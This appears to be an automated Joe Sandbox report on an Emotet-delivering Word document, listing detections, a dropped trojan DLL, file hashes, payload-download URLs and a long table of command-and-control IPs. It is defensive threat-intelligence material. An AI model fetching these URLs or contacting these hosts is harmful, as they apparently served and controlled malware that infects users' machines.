Signatures on rundll32.exe: System process connects to network (likely due to code injection or exploit); Hides that the sample has been downloaded from the Internet (zone.identifier).
Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 17 other signatures.

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

Source | Detection | Scanner | Label
ARCHIVOFile-20-012021.doc | 48% | Virustotal |
ARCHIVOFile-20-012021.doc | 50% | ReversingLabs | Document-Office.Trojan.GenScript

                      Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | 100% | Joe Sandbox ML |
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | 46% | Metadefender |
C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll | 86% | ReversingLabs | Win32.Trojan.EmotetCrypt

                      Unpacked PE Files


                      Domains

Source | Detection | Scanner | Label
hbprivileged.com | 7% | Virustotal |
mrveggy.com | 5% | Virustotal |

                      URLs


                      Domains and IPs

                      Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
hbprivileged.com | 35.209.96.32 | true | true | | unknown
mrveggy.com | 177.12.170.95 | true | true | | unknown
ummahstars.com | 35.163.191.195 | true | true | | unknown
riandutra.com | 191.6.196.95 | true | true | | unknown
calledtochange.org | 75.103.81.81 | true | true | | unknown
norailya.com | 104.168.154.203 | true | true | | unknown

                              Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://riandutra.com/email/AfhE8z0/ | true | Avira URL Cloud: safe | unknown
http://calledtochange.org/CalledtoChange/8huSOd/ | true | Avira URL Cloud: malware | unknown

                              URLs from Memory and Binaries


                                                                      Contacted IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      200.75.39.254:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      192.175.111.212:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      191.6.196.95
                                                                      unknownBrazil
                                                                      28299IPV6InternetLtdaBRtrue
                                                                      91.233.197.70:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      93.149.120.214:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      212.71.237.140:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      93.146.143.191:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      75.103.81.81
                                                                      unknownUnited States
                                                                      14992CRYSTALTECHUStrue
                                                                      181.30.61.163:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      46.101.58.37:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      206.189.232.2:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      213.52.74.198:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      181.10.46.92:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      51.255.203.164
                                                                      unknownFrance
                                                                      16276OVHFRtrue
                                                                      191.223.36.170:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      83.169.21.32:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      186.177.174.163:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      70.32.84.74:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      217.13.106.14:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      138.97.60.141:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      111.67.12.221:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      201.185.69.28:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      45.16.226.117:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      51.15.7.145:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      82.208.146.142:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      1.226.84.243:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      84.232.229.24
                                                                      unknownRomania
                                                                      8708RCS-RDS73-75DrStaicoviciROtrue
                                                                      70.32.115.157:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      217.160.169.110:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      85.105.239.184:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      152.170.79.100:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      143.0.85.206:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      35.163.191.195
                                                                      unknownUnited States
                                                                      16509AMAZON-02UStrue
                                                                      51.255.203.164:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      94.176.234.118:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      50.28.51.143:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      31.27.59.105:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      185.94.252.27:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.114.254.163:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      197.232.36.108:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.45.24.210:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      185.183.16.47:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.24.243.186:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.64.88.186:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      82.48.39.246:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      191.241.233.198:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      170.81.48.2:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      172.245.248.239:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      95.76.153.115:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      154.127.113.242:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      211.215.18.93:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      177.12.170.95
                                                                      unknownBrazil
                                                                      28299IPV6InternetLtdaBRtrue
                                                                      80.249.176.206:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      110.39.160.38:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      137.74.106.111:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      5.196.35.138:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      188.135.15.49:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      46.43.2.95:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      68.183.190.199:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      177.23.7.151:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      201.48.121.65:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      105.209.235.113:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      60.93.23.51:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      62.84.75.50:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.247.139.101:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      177.85.167.10:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      51.255.165.160:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      172.104.169.32:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      68.183.170.114:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      149.202.72.142:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      209.33.120.130:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      178.250.54.208:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      12.163.208.58:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      84.232.229.24:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      81.17.93.134:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      152.231.89.226:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      35.209.96.32
                                                                      unknownUnited States
                                                                      19527GOOGLE-2UStrue
                                                                      87.106.46.107:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      202.134.4.210:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      78.206.229.130:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      12.162.84.2:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.162.232.138:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      187.162.248.237:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      152.169.22.67:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      109.101.137.162:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      122.201.23.45:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      85.214.26.7:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      188.225.32.231:7080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      104.168.154.203
                                                                      unknownUnited States
                                                                      54290HOSTWINDSUStrue
                                                                      190.251.216.100:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      104.131.41.185:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      80.15.100.37:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      81.215.230.173:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      167.71.148.58:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      46.105.114.137:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      110.39.162.2:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      178.211.45.66:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      190.210.246.253:80
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      81.214.253.80:443
                                                                      unknownunknown
                                                                      unknownunknowntrue
                                                                      138.197.99.250:8080
                                                                      unknownunknown
                                                                      unknownunknowntrue

                                                                      General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 344894
Start date: 27.01.2021
Start time: 12:16:43
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 21s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: ARCHIVOFile-20-012021.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed: 20
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• GSI enabled (VBA)
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.evad.winDOC@32/14@6/100
EGA Information:
• Successful, ratio: 92.3%
HDC Information:
• Successful, ratio: 33.6% (good quality ratio 24.1%)
• Quality average: 58.5%
• Quality standard deviation: 37.9%
HCA Information:
• Successful, ratio: 86%
• Number of executed functions: 33
• Number of non-executed functions: 80
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Found warning dialog
• Click Ok
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                                      • Excluded IPs from analysis (whitelisted): 192.35.177.64, 72.247.178.8, 72.247.178.41, 72.247.178.32, 72.247.178.26, 72.247.178.11, 72.247.178.35
                                                                      • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, a767.dscg3.akamai.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                                                                      • Execution Graph export aborted for target powershell.exe, PID 2552 because it is empty
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      Time      Type             Description
                                                                      12:17:36  API Interceptor  1x Sleep call for process: msg.exe modified
                                                                      12:17:36  API Interceptor  102x Sleep call for process: powershell.exe modified
                                                                      12:17:57  API Interceptor  181x Sleep call for process: rundll32.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs


                                                                      Domains


                                                                      ASN


                                                                      JA3 Fingerprints


                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type: Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                      Category: dropped
                                                                      Size (bytes): 59134
                                                                      Entropy (8bit): 7.995450161616763
                                                                      Encrypted: true
                                                                      SSDEEP: 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                      MD5: E92176B0889CC1BB97114BEB2F3C1728
                                                                      SHA1: AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                      SHA-256: 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                      SHA-512: CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                      Malicious: false
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):893
                                                                      Entropy (8bit):7.366016576663508
                                                                      Encrypted:false
                                                                      SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                      MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                      SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                      SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                      SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                      Malicious:false
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):328
                                                                      Entropy (8bit):3.0664620025581253
                                                                      Encrypted:false
                                                                      SSDEEP:6:kKCHbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:B3kPlE99SNxAhUeo+aKt
                                                                      MD5:8AB92BD02DEBE46B03720E9B4E92FEF4
                                                                      SHA1:1201275CD8B208AA5FE8B509DD66BD9FE2E53383
                                                                      SHA-256:498E98249C1BB06868B90E21DC38041E9BEF547E0763D61F2ECCB86F00FB6404
                                                                      SHA-512:85CA865095F251133261FC4054866C8623339E466003BAC5E3C5A94B9018CB05ECC3C55214B98C12BF77C485E76ABFC00D989E477DC59D191C114BC8488783FE
                                                                      Malicious:false
                                                                      Preview: p...... ........:..w....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...
                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):252
                                                                      Entropy (8bit):3.0215269645321685
                                                                      Encrypted:false
                                                                      SSDEEP:3:kkFkllRzEvfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKwIliBAIdQZV7eAYLit
                                                                      MD5:DC910AE1F9AE675627D93DF168B8B4A7
                                                                      SHA1:F1812087EE764C1ED12E399B164BDBBEA33235D8
                                                                      SHA-256:90278AA59F3EBA385DA5E25B790F7897C21E262DBA2CDC6E08EDBD211A5123A9
                                                                      SHA-512:847369ACB7C56ACE8357FD58CAECF72EDE8444A1659343094373B7C5ED39EF82885B4162C8DA3869D8D74F95EF18737845E46C98B045CC659F0B078BA929479B
                                                                      Malicious:false
                                                                      Preview: p...... ....`....Y.w....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmp
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1024
                                                                      Entropy (8bit):0.05390218305374581
                                                                      Encrypted:false
                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                      Malicious:false
                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E76E1ED2-1DC6-41B5-9D5C-624688043260}.tmp
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):1536
                                                                      Entropy (8bit):1.3554734412254814
                                                                      Encrypted:false
                                                                      SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbE:IiiiiiiiiifdLloZQc8++lsJe1MzL
                                                                      MD5:3E5010CAE259871D6964270190F8ADCE
                                                                      SHA1:C57EA259D1DF1C244C8A4C4D3AC7FA37AEFA1869
                                                                      SHA-256:F1B89BC47B850CD5352C45E86AEC6F63F6C80F22FA4A9CC589EF18219E6BF8EB
                                                                      SHA-512:FC6112BB9EF82273E598CF32220CE02EEBC57A9B805E438D3207F5CA7C02C4990E5B5CABF2B1BB7AEF7E9CA69D966DD0E0BD90E2C5B591BBE94FACD3636E2ADD
                                                                      Malicious:false
                                                                      C:\Users\user\AppData\Local\Temp\Cab479B.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):59134
                                                                      Entropy (8bit):7.995450161616763
                                                                      Encrypted:true
                                                                      SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                                      MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                                      SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                                      SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                                      SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                                      Malicious:false
                                                                      C:\Users\user\AppData\Local\Temp\Tar479C.tmp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):152788
                                                                      Entropy (8bit):6.316654432555028
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                                      MD5:64FEDADE4387A8B92C120B21EC61E394
                                                                      SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                                      SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                                      SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                                      Malicious:false
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\ARCHIVOFile-20-012021.LNK
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Wed Jan 27 19:17:33 2021, length=163328, window=hide
                                                                      Category:dropped
                                                                      Size (bytes):2138
                                                                      Entropy (8bit):4.5326539197703415
                                                                      Encrypted:false
                                                                      SSDEEP:48:8b/XT3Inbeh6o3up5Qh2b/XT3Inbeh6o3up5Q/:8b/XLInbXdp5Qh2b/XLInbXdp5Q/
                                                                      MD5:05A81D9871CC5A9D1C9496971871A4C3
                                                                      SHA1:4B43D1A721FDEED3C350721541F3F032E98057DC
                                                                      SHA-256:F2631F760EED5D1400F08304FDE9686A689A11AAA5343519DF9F988C18ADA39B
                                                                      SHA-512:725EF51348035ACA47084FE0C13FED8AD39801962A1DA3E1854984A78E6769138ACC2874086513B983CC9A9781E9A7E8CCE6B314E3A315826F1106E19158113B
                                                                      Malicious:false
                                                                      Preview: L..................F.... ...$l...{..$l...{....'r.....~...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2..~..;R1. .ARCHIV~1.DOC..`.......Q.y.Q.y*...8.....................A.R.C.H.I.V.O.F.i.l.e.-.2.0.-.0.1.2.0.2.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\445817\Users.user\Desktop\ARCHIVOFile-20-012021.doc.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.A.R.C.H.I.V.O.F.i.l.e.-.2.0.-.0.1.2.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......445817.........
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):101
                                                                      Entropy (8bit):4.560529244991619
                                                                      Encrypted:false
                                                                      SSDEEP:3:M1+GFVCl8WLFVClmX1+GFVClv:M4G6rL6PG61
                                                                      MD5:BCAC8ED9B42DA8EFA65F54705C070EC9
                                                                      SHA1:F176DE20E4C0A978E9E5E0039B71EA72D94E1C20
                                                                      SHA-256:E0586F37CF5912AC227F6363F87FF700D71C8C2CE24E933C7DB34DEDD9551F3F
                                                                      SHA-512:F66C0695FAD82E6842E9FDC2AAFBE40FE51EC071737B6F2116C7035895DB01C52934DF3256603C88E158F0AA2435C9C273B8960210845BF3B9FF18FD25CF87E9
                                                                      Malicious:false
                                                                      Preview: [doc]..ARCHIVOFile-20-012021.LNK=0..ARCHIVOFile-20-012021.LNK=0..[doc]..ARCHIVOFile-20-012021.LNK=0..
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1JTN6F3VHEJQWGEUZSLB.temp
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):8016
                                                                      Entropy (8bit):3.587203250476091
                                                                      Encrypted:false
                                                                      SSDEEP:96:chQCIMqZqvsqvJCwofz8hQCIMqZqvsEHyqvJCworZzv9YyH8f8OZlUVNIu:c2wofz82MHnorZzvyf8OIIu
                                                                      MD5:9AFBC91BB6F8B5858AB7A4886ABC3073
                                                                      SHA1:3F15E4645EB1DF3E393D032664CEDF46A22C5A60
                                                                      SHA-256:5D85266D69AFD60CE498DEBB2375E63D81F2534E6F4104692C11D904D81DCCCA
                                                                      SHA-512:6B5F8AA7CBE4E1EA63654DEA4EC746D3A7C0F588D9CE2A48D500BC3175D9D255FBD806CDDA798C04B6D0FCE2F09295F6755A17F482085DE2460ED1269D4EA324
                                                                      Malicious:false
                                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Q.y..Programs..f.......:...Q.y*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                      C:\Users\user\Desktop\~$CHIVOFile-20-012021.doc
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.431160061181642
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                      Malicious:false
                                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                      C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:modified
                                                                      Size (bytes):354648
                                                                      Entropy (8bit):4.29030621772406
                                                                      Encrypted:false
                                                                      SSDEEP:3072:L82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:I2L7HN7Kl/jLA90QECrYRpj
